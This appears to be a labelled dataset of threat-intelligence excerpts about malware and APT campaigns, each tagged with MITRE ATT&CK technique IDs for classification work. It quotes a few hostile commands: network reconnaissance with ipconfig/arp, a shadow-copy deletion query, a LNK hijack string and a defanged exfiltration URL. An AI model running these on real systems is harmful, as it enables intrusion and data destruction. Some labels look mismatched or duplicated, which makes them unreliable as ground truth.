{"text1":"Cobalt is one of the most notorious cybercrime operations, with attacks against more than 100 banks across 40 countries attributed to the group. Morphisec Labs believes that the Cobalt Group split following the arrest of one of its top leaders in Spain in March of 2018. While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group\u2019s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. Although the code is heavily obfuscated, the entry point is easily identifiable. The VB code is executed starting from the Frame1_Layout function \u2013 this method is used much less frequently than the obvious Document_Open or the AutoOpen. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Organizations should expect to see much more coming from all Cobalt Group factions during the next year","labels":"['T1027']"}
|
|
{"text1":"Establish persistence for itself on the endpoint - Establish persistence of another component of the malware on the endpoint - Update itself on endpoint after a separate updater component downloads the update from the control server","labels":"['T1070.004', 'T1547.001']"}
|
|
{"text1":"Regularly, the service checks whether a user is logged in by checking if Explorer is running. Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe","labels":"['T1057']"}
|
|
{"text1":"The sample collects the user information including current processes, installed software, system language and time zone. The harvested credentials and user information are then sent back to the C2. Here are some highlights about system information stealing","labels":"['T1124']"}
|
|
{"text1":"Passgrabber module \u2013 collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms","labels":"['T1555.003']"}
|
|
{"text1":"The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In at least one case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication","labels":"['T1547.004']"}
|
|
{"text1":"The Cloud Atlas implants utilize a rather unusual C&C mechanism. All the malware samples we\u2019ve seen communicate via HTTPS and WebDav with the same server \u201ccloudme.com\u201d, a cloud services provider. According to their website, CloudMe is owned and operated by CloudMe AB, a company based in Link\u00f6ping, Sweden","labels":"['T1102']"}
|
|
{"text1":"These websites hosted malware that would be side-loaded with a legitimate signed executable. These tactics are becoming increasingly common by malware authors in order to evade security products and controls. Two variants of the malware employed by C0d0so0 were discovered\u2014one that used HTTP for command and control (C2) communications, and one that used a custom network protocol over port 22","labels":"['T1132.001', 'T1574.002']"}
|
|
{"text1":"Gather all network configuration information and record to a file on disk in a folder created by the implant using the command:\u00a0cmd.exe \/c ipconfig\/all >>\"%s\" & arp -a >>\"%s\"\u00a0where %s = <file_path","labels":"['T1016']"}
|
|
{"text1":"The overwritten code reads the ransom note string inside the MBR and sets it to appear on the display","labels":"['T1542.003']"}
|
|
{"text1":"Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. Regarding Metasploit\u2019s shikata_ga_nai encoder \u2013 although it\u2019s available for everyone and couldn\u2019t be the basis for attribution, we know this encoder has been used by LuckyMouse previously. Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can\u2019t prove they were related to this particular attack. The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to an IP address that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board","labels":"['T1574.002']"}
|
|
{"text1":"Similar to its dropper, the binary seeks to evade sandboxes. In addition to the previously described trick EvilBunny performs hook detection to trick environments which hook time retrieval APIs. These are NtQuerySystemTime, GetSystemTimeAsFileTime and GetTickCount. Every API is called twice to calculate a delta, while performing a sleep(1000) operation between iteration one and iteration two. This can only be the case if any of the three API\u2019s return values is modified by a system monitoring solution, like a sandbox","labels":"['T1124']"}
|
|
{"text1":"Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the dropper is deleted once the malware was successfully deployed","labels":"['T1059.003', 'T1070.004']"}
|
|
{"text1":"CTU analysis of one of GOLD KINGSWOOD's campaigns using SpicyOmelette (DOC2018.js) exposed additional sophisticated methods to compromise targets. A valid digital certificate was used to sign the malicious script. Windows Scripting Host supports the inclusion of digital signatures, and Figure 2 shows how the signature was appended to the script","labels":"['T1553.002']"}
|
|
{"text1":"There are multiple active campaigns currently delivering Emotet. The first is a simple email with a Word document attached. This example also shows the second type of campaign, leveraging a direct URL download instead of Office documents with macros that fetch the malware. Malicious code embedded in the malicious attachment functions as a downloader for the Emotet malware. When this code is executed, PowerShell is invoked, which reaches out to the Emotet malware distribution server, downloads the malicious payload, and executes it, thus infecting the system. In the screenshot above, you can see that the script is configured with multiple URLs that can be used to download the PE32 executable associated with Emotet. The malware is overwhelmingly hosted on compromised websites. These sites are then leveraged as random hosting locations for the campaigns to leverage. The initial URL is requested with a connection keep-alive in the header. Talos has observed recent runs of Emotet checking if the compromised system's IP address is currently found on many spam-related blocklists including those hosted by SpamCop, Spamhaus, and SORBS, among others","labels":"['T1027']"}
|
|
{"text1":"Historically, the group has employed the use of a series of phishing origin points, abusing access first at one university and then another","labels":"['T1583.001']"}
|
|
{"text1":"After uploading these files, take advantage of the pre-built queries within BloodHound. Queries include: viewing all domain administrators; viewing users with the most local administrator rights; or viewing computers with the most administrative user access. One of these queries gives you the ability to map domain trusts, as shown in Figure 3","labels":"['T1482']"}
|
|
{"text1":"Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files","labels":"['T1204.002']"}
|
|
{"text1":"In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\\ partition by overwriting it with fixed data. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable. As a result, there were additional stages and additional payloads that could inflict more damage to end systems","labels":"['T1561.002']"}
|
|
{"text1":"This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies","labels":"['T1585.002']"}
|
|
{"text1":"This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. It places the resulting executable in an existing directory and creates a scheduled task that will launch it every 10 minutes. As can be seen in Figure 6, the decoded source code still has comments in it, illustrating the apparent sloppiness of Gamaredon\u2019s operators","labels":"['T1027.001', 'T1053.005']"}
|
|
{"text1":"The attackers configured multiple C2 servers for various stages, reusing several scripts we\u2019ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns","labels":"['T1584.004']"}
|
|
{"text1":"APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement","labels":"['T1505.003']"}
|
|
{"text1":"Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub project called FruityC2. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information","labels":"['T1036.005']"}
|
|
{"text1":"Among the different files dropped by the latest versions of Ramsay we find a Spreader component. This executable will attempt to scan for network shares and removable drives excluding A: and B: drives","labels":"['T1080']"}
|
|
{"text1":"These commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware","labels":"['T1016', 'T1082', 'T1007']"}
|
|
{"text1":"1) Moving the (malicious) application into the \/Users\/user\/Library\/ directory 2) Executing this persisted copy, via the open command 3) Decrypting embedded strings that relate to file extensions of (likely) interest","labels":"['T1036']"}
|
|
{"text1":"TA505 has been responsible for many large-scale attacks since at least 2014, using malicious email campaigns to distribute various banking trojans, ransomware, RATs, and backdoors. TA505 has been focused on delivering downloaders, information stealers, and other malware \u2014 threats that can remain in affected systems if not prevented or remediated. With the group's use of email as an entry point for malicious activities, the threat has become more serious for unwitting users and organizations","labels":"['T1566.001']"}
|
|
{"text1":"The Autorun manager subsystem is responsible for tracking the way that the malicious module starts in the system and it maintains several different methods for starting automatically (shown below): LinkAutorun The subsystem searches for a LNK file in the target directory, changes the path to \u201ccmd.exe\u201d and the description to \u2018 \/q \/c start \u201c\u201d \u201c%s\u201d && start \u201c\u201d \u201c%s\u201d \u2018 TaskScheduler20Autorun The subsystem creates the ITaskService (works only on Windows Vista+) and uses the ITaskService interface to create a new task with a logon trigger StartupAutorun The subsystem creates a LNK file in %STARTUP% ScreenSaverAutorun The subsystem installs as a current screensaver with a hidden window HiddenTaskAutorun The subsystem creates the task ITaskScheduler (works only on pre-Vista NT). The task trigger start date is set to the creation date of the Windows directory ShellAutorun Winlogon registry [HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon] Shell=\u201dexplorer.exe","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim\u2019s machine. Execute the command","labels":"['T1059.003']"}
|
|
{"text1":"1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. While we know the attackers used a custom dropper to install the back door, we do not know the delivery vector. Based on the amount of open-source information available on the target, it is feasible that a spear-phishing email may have been used. We found evidence that Suckfly used hacktools to move laterally and escalate privileges. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 5) The attackers\u2019 final step was to exfiltrate data off the victim\u2019s network and onto Suckfly\u2019s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information","labels":"['T1003']"}
|
|
{"text1":"In order to download the additional modules, the malware uses the BITSAdmin tool, which this group has relied on for some years to avoid detection, since this is an allowlisted tool from the Windows operating system. By the end of September 2019, we started seeing a new version of Guildma malware being distributed that used a new technique for storing downloaded payloads in NTFS Alternate Data Streams in order to conceal their presence in the system","labels":"['T1105']"}
|
|
{"text1":"The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download\/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2","labels":"['T1010']"}
|
|
{"text1":"NV.html, tracked by Microsoft as EnvyScout, can be best described as a malicious dropper capable of de-obfuscating and writing a malicious ISO file to disk. EnvyScout is chiefly delivered to targets of NOBELIUM by way of an attachment to spear-phishing emails","labels":"['T1204.002', 'T1140']"}
|
|
{"text1":"In order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the idgenerator script and its output is sent to the C&C server by the updater.sh script","labels":"['T1016']"}
|
|
{"text1":"One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros","labels":"['T1566.001', 'T1027', 'T1204.002', 'T1221']"}
|
|
{"text1":"First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration","labels":"['T1573.001', 'T1546.015']"}
|
|
{"text1":"Creates 2 objects in the AD forest Configuration partition. Updates the SPN of the computer used to include \u201cGC\u201d (Global Catalog) and \u201cE3514235-4B06-11D1-AB04-00C04FC2DCD2\u201d (AD Replication). More info on Kerberos Service Principal Names in the ADSecurity SPN section. Pushes the updates to DCs via DrsReplicaAdd and KCC","labels":"['T1207']"}
|
|
{"text1":"The exported procedure HandlerW, responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another process\u2019s token just for the execution of a command","labels":"['T1134.002']"}
|
|
{"text1":"Then, it reads the dropped file with the .db3 extension, which contains position-independent code, and uses CreateThread to execute its content","labels":"['T1574.002']"}
|
|
{"text1":"The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan\u2019s capabilities. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver","labels":"['T1105']"}
|
|
{"text1":"Winnti malware handles outbound communications using multiple protocols including: ICMP, HTTP, as well as custom TCP and UDP protocols. Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports","labels":"['T1071.001', 'T1095']"}
|
|
{"text1":"Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant is a service DLL that can also run as a standalone process","labels":"['T1569.002']"}
|
|
{"text1":"DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id","labels":"['T1047', 'T1490', 'T1490', 'T1490', 'T1047', 'T1047']"}
|
|
{"text1":"In the cases where Sakula does not use a registry key for persistence, it attempts to set itself up as a service (see Table 2). It invokes itself by calling WinExec with the \"net start %s\" argument (without quotes), where \"%s\" is the service name","labels":"['T1543.003']"}
|
|
{"text1":"The threat actor launched a series of reconnaissance commands to try to obtain and enumerate information about the compromised machine, network architecture, users, and active directory enumeration","labels":"['T1049']"}
|
|
{"text1":"FireEye Research Labs, the intelligence behind our Mandiant Consultancy services, identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. Microsoft has assigned CVE-2014-1776 to the vulnerability and released security advisory to track this issue","labels":"['T1203']"}
|
|
{"text1":"In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload","labels":"['T1059.001']"}
|
|
{"text1":"One of the file path name combinations observed was \u2018C:\\ProgramData\\Dacr\\macrse.exe\u2019, also configured in a Crimson \u201cMain Client\u201d sample and used for saving the payload received from the C2 when invoking the usbwrm command","labels":"['T1105']"}
|
|
{"text1":"In this case, we can see the binary installation path and local reconnaissance to determine which flavor of Linux the malware is running. This is followed by a number of Linux shell command style commands related to the malware establishing persistence","labels":"['T1082']"}
|
|
{"text1":"Command Number \u2013 a running index number to keep track of executed commands. If set to any number other than -1, the backdoor should proceed to execute the command, according to the Command ID. Command ID \u2013 can be one of the following commands: 101 \u2013 Shell Command: execute the Shell command attached in the {Arg1} argument. 102 \u2013 Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 \u2013 Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument","labels":"['T1059.003']"}
|
|
{"text1":"Also, on some infected computers we found a tool called the Winexesvc tool. The main difference is that the Winexesvc tool enables the execution of remote commands from a Linux-based operating system. When the Linux binary \u201cwinexe\u201d is run against a Windows server, the winexesvc.exe executable is created and installed as a service","labels":"['T1569.002']"}
|
|
{"text1":"CertPKIProvider.dll, tracked by Microsoft as \u201cVaporRage\u201d can best be described as a shellcode downloader. This version of VaporRage contains 11 export functions including eglGetConfigs, which houses the malicious functionality of the DLL","labels":"['T1105']"}
|
|
{"text1":"On other websites, different cloud storage solutions such as Amazon S3 or Google Drive were used to host Windows, OSX, and Android malware payloads","labels":"['T1583.006', 'T1102', 'T1608.001']"}
|
|
{"text1":"Conclusion. The DarkHydrus group carried out an attack campaign on at least one government agency in the Middle East using malicious .iqy files. The .iqy files take advantage of Excel's willingness to download and include the contents from a remote server in a spreadsheet. DarkHydrus leveraged this obscure file format to run a command to ultimately install a PowerShell script to gain backdoor access to the system. The PowerShell backdoor delivered in this current attack may have been custom developed by the threat group; however, it is possible that DarkHydrus pieced together this tool by using code from legitimate open source tools","labels":"['T1059.001']"}
|
|
{"text1":"Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\\Windows\\Debug and C:\\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence. Receiving C2 instructions from user profiles created by the adversary on legitimate websites\/forums such as Github and Microsoft's TechNet portal","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"After collecting the data in a central directory, the attackers then used either a renamed rar.exe or 7z.exe to archive the files. NICKEL also frequently used keyboard walks as a password for their archived data collections. The following are examples of RAR archiving for exfiltration","labels":"['T1560.001']"}
|
|
{"text1":"Distributing the ransomware using spear-phishing and weaponized documents - Bat-files downloading payloads from Pastebin and injecting them into a process on the operating system - Compromising RDP and usage of script files and password cracking tools to distribute over the victim\u2019s network - Compromise of Managed Service Providers and usage of their distribution software to spread the ransomware","labels":"['T1055']"}
|
|
{"text1":"Perhaps the most interesting part here is the unusual command and control mechanism based on TCP\/UDP packets, as well as the C&C hostname\u00a0which fits previously known Turla activity","labels":"['T1095']"}
|
|
{"text1":"The button would then lead to the download of a RAR archive named Adobe_Flash_Install.rar. This archive was designed to fool the targeted user into infecting themselves with a Cobalt Strike implant. Details on the contents of this file are included later in this report","labels":"['T1204.001']"}
|
|
{"text1":"Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service\u2014a reverse proxy software that creates secure tunnels\u2014to collect the stolen data","labels":"['T1572']"}
|
|
{"text1":"The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe. At the same time, code embedded within this file also executed a PowerShell command to download and execute a copy of chfeeds.vbe from the C&C server","labels":"['T1059.001']"}
|
|
{"text1":"In between then and now there has been a lot of rumour and debate about all aspects of this attack with many truths and mistruths being carried in public. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862\/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Clear all system event logs. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the \u201cattack surface\u201d by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. Potential attack scenario: When using this vulnerability the most likely attack vector used in this case is targeted emails containing legitimate looking PDF documents sent to high level employees","labels":"['T1070.001']"}
|
|
{"text1":"It runs the ipconfig command to gather information about the machine's network adapter configuration. It sends an HTTP POST request to the URL: hxxp:\/\/zeplin.atwebpages.com\/inter.php and exfiltrates the ipconfig output gathered from the\u00a0machine","labels":"['T1016']"}
|
|
{"text1":"We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. The attackers behind OSX_OCEANLOTUS.D target MacOS computers which have the Perl programming language installed","labels":"['T1082']"}
|
|
{"text1":"The use of large size files to avoid detection by security solutions with hardcoded size limits for \u2018efficiency\u2019. - A fishing-with-dynamite approach to collecting initial access to victims with low-cost tooling","labels":"['T1027.001']"}
|
|
{"text1":"In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed that the obfuscation used by the OilRig group in these QUADAGENT samples was likely the result of using an open-source toolkit called Invoke-Obfuscation. This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1","labels":"['T1027']"}
|
|
{"text1":"The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed","labels":"['T1204.001', 'T1059.005']"}
|
|
{"text1":"Aria-body starts with gathering data on the victim\u2019s machine, including: Host-name, computer-name, username, domain name, windows version, processor ~MHz, MachineGuid, 64bit or not, and public IP (using checkip.amazonaws.com","labels":"['T1016', 'T1082']"}
|
|
{"text1":"yty\u201d, the name we use for the framework, from the PDB path string. A \u201cbot id\u201d consisting of computer name, user name, and volume serial number separated by dashes","labels":"['T1082']"}
|
|
{"text1":"Once Shellex is called, it first passes each of the items in the config buffer to their own strings. Next, it creates a mutex using the filename and checks to see if the Service key for the service name exists. If so, it opens it using service manager. If not, it first saves a copy of itself to %Program Files (x86)%\/DIFXE\/svchost.exe. Next, it creates the service and runs it","labels":"['T1012', 'T1569.002']"}
|
|
{"text1":"The wiper could be configured to use a file to overwrite the files on the disk using the \u2018F\u2019 configuration flag, as we saw images used to overwrite files in previous Shamoon attacks. This file would be stored in a resource named \u2018GRANT\u2019, but this particular wiper is not configured to use a file for overwriting so the GRANT resource does not exist. If it were configured to use a file, this sample would extract the file using the information listed in Table 5","labels":"['T1561.002']"}
|
|
{"text1":"This single hack of Volusion allows them to receive credit card data from 3,126 online shops. From the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to register the domains of the exfiltration server to be similar to the victims\u2019 domains. In this case, the domain of the exfiltration server is \u201cvolusion-cdn[.]com\u201d \u2014 very similar to the valid domain \u201ccdn3[.]volusion[.]com\u201d from Volusion. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the jQuery.ajax function to POST data to a remote server. Although the older skimmer is much simpler compared to the current one, it didn\u2019t encode the stolen data or store the data in sessionStorage before the exfiltration","labels":"['T1048.003']"}
|
|
{"text1":"The string is visible within the unpacked Karagany binary and is not itself encrypted. Once the payload has been AES-encrypted, it is prepended with the IV value and Base64-encoded for transmission. Figures 4 and 5 show an example decode and decryption based on sinkhole data obtained by CTU researchers of a Karagany beacon payload","labels":"['T1027']"}
|
|
{"text1":"After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex. This registry key is empty upon the first execution of the payload. This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail","labels":"['T1070.004']"}
|
|
{"text1":"If none of the C2 servers respond and the end of the configured hosts list is reached, the modulo operation returns zero, thus host_index is equal to zero and the backdoor waits for the number of milliseconds stored in the <TimeLong> registry key. In our case, this was set to one minute. Then, it starts again and tries to reach the configured C2 servers, again host-by-host, until one responds. If a connection to one of the configured C2 servers was set up successfully, the backdoor stays in the inner while loop (C2 control loop) and checks for commands every <TimeShort> number of milliseconds. C2_GetCommand_ComHandler handles the communication with the C2 server. It leverages the Windows WinHttp API similar to this Microsoft example and receives the C2 command along with its parameters. The adversaries use SSL\/TLS to encrypt the C2 traffic","labels":"['T1029']"}
|
|
{"text1":"In the instances we have observed, the threat actor sent spear-phishing emails, luring the victims to open a malicious Microsoft Excel\/Word document. The Word droppers were using standard VBA macros to download the payload. The actor tailored the decoy contents to the targeted victims, using logos and themes relevant to the targeted company or using trending topics from their region and, in one instance, even mimicking the Palestinian authority","labels":"['T1082', 'T1566.001']"}
|
|
{"text1":"m\": mode:\u00a0net\u00a0or\u00a0local. local\u00a0- encrypt local drives only and ignore network shares. h\": path to a file that contains specific hosts (names and IPs) to enumerate for shares. s\": IP address that the initial register message will be sent to","labels":"['T1016']"}
|
|
{"text1":"FIN7 developed evasive techniques at a rapid pace. Throughout 2017, FIN7 was observed creating novel obfuscation methods, and in some cases modifying the methods on a daily basis while launching attacks targeting multiple victims. Their development of a payload obfuscation style using the Windows command interpreter's (cmd.exe) native string substitution was so unique that FireEye dubbed it \"FINcoding.\" These methods inspired deep command line obfuscation research and the release of Daniel Bohannon's Invoke-DOSfuscation. Reference Table 2 and Table 3 for a selection of samples and their associated command line obfuscation techniques","labels":"['T1059.003']"}
|
|
{"text1":"The kill_unwanted function gets a list of running processes and compares each process with an encrypted list of \u201cunwanted\u201d programs. With our aforementioned breakpoint on the ei_str function, we can dump the decrypted strings to ascertain the value of the \u201cunwanted\u201d programs","labels":"['T1057', 'T1562.001', 'T1518.001']"}
|
|
{"text1":"Charming Kitten has taken full advantage of this timing to execute its new campaign to maximum effect. Details of the Attacks. Our examination of the acquired samples shows hackers generally use two main methods of \u201cSending Fake SMS\u201d and \u201cSending Fake Emails\u201d to execute their attacks. They send confirmation messages stating \u2018Google Account Recovery\u2019 to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity. Method #2: Fake Email. Another method used in this phishing campaign is sending fake emails with deceptive titles like \u201cMerry Christmas, and sending note\/book\/photo and others\u201d, which are usually sent from previously hacked email accounts. Figure 2 shows one of these phishing emails where the attackers cordially invite the target to open the link in the email\u2019s body. For example, Figure 3 shows another fake email that was sent to the same victim a day after the initial email (Figure 2). Figure 3. A sample of a fake email sent after the initial email to the target. Redirect Chain. Utilizing and weaponizing legal and credible services to hide destructive intent is one of the techniques used by hackers in some phishing campaigns. Redirection links initially help bypass the security layers in email services, and then provide the attackers more control to redirect the target to the final URL. As usual, we firmly suggest not to click on unknown links, to carefully review any URLs before entering credential information, and not to download and run unknown files on mobile, personal or work computers. It is important to note that the main cases mentioned in this report relate to the latest Charming Kitten phishing campaign and that this campaign has significantly intensified in recent days","labels":"['T1566.002']"}
|
|
{"text1":"The payload is a 32-bit executable file that is used to encrypt files on the victim\u2019s system to extort a ransom","labels":"['T1083']"}
|
|
{"text1":"SpeakUp\u2019s persistence is ensured by using cron and an internal mutex to ensure only one instance remains alive at all times","labels":"['T1053.003']"}
|
|
{"text1":"In January, we saw a variant of the disk-wiping KillDisk malware hitting several financial institutions in Latin America. Last May, we uncovered a master boot record (MBR)-wiping malware in the same region","labels":"['T1561.002']"}
|
|
{"text1":"To make detection and analysis harder, QakBot encrypts its strings and decrypts them at runtime before use. Once the QakBot execution logic is finished using a string, it will immediately delete the string from memory. An example of this can be seen in Figure 6 below, which shows QakBot decrypting a string containing the value for lpProcName passed as a parameter to the GetProcAddress API call. The selected function, which has been labeled in IDA Pro as, \u201coc_clear_mem\u201d deletes the string memory right after it retrieves the process address","labels":"['T1106']"}
|
|
{"text1":"The SombRAT loader recovered in this incident was a 64-bit variant that allowed the malicious actor to remotely download and load executable dynamic-link libraries (DLL) plugins on the affected system (Ingress Tool Transfer [T1105]). The loader used hardcoded public RSA keys for command and control (C2) sessions (Command and Control [TA0011]). The C2 communications were encrypted using Advanced Encryption Standard (AES), resulting in a Secure Sockets Layer tunnel with the threat actors (Encrypted Channel: Asymmetric Cryptography [T1573.002","labels":"['T1027']"}
|
|
